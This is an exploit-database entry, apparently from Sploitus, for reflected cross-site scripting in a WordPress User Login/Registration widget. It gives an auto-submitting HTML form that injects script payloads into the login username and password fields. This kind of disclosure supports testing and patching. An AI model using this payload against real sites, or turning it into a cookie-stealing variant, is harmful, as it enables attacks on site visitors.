Share
## https://sploitus.com/exploit?id=WPEX-ID:D203BF3B-AEE9-4755-B429-D6BBDD940890
On a site with the User Login/Registration widget active, have an unauthenticated user send a post request to the any page where the widget appears:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com" method="post">
        <input type="hidden" name="login_username" value='"><script>alert(1)</script>' />
        <input type="hidden" name="login_password" value='"><script>alert(2)</script>' />
        <input type="hidden" name="widget_login_submit" value="Login" />
        <input type="submit" value="Submit" />
    </form>
</body>
```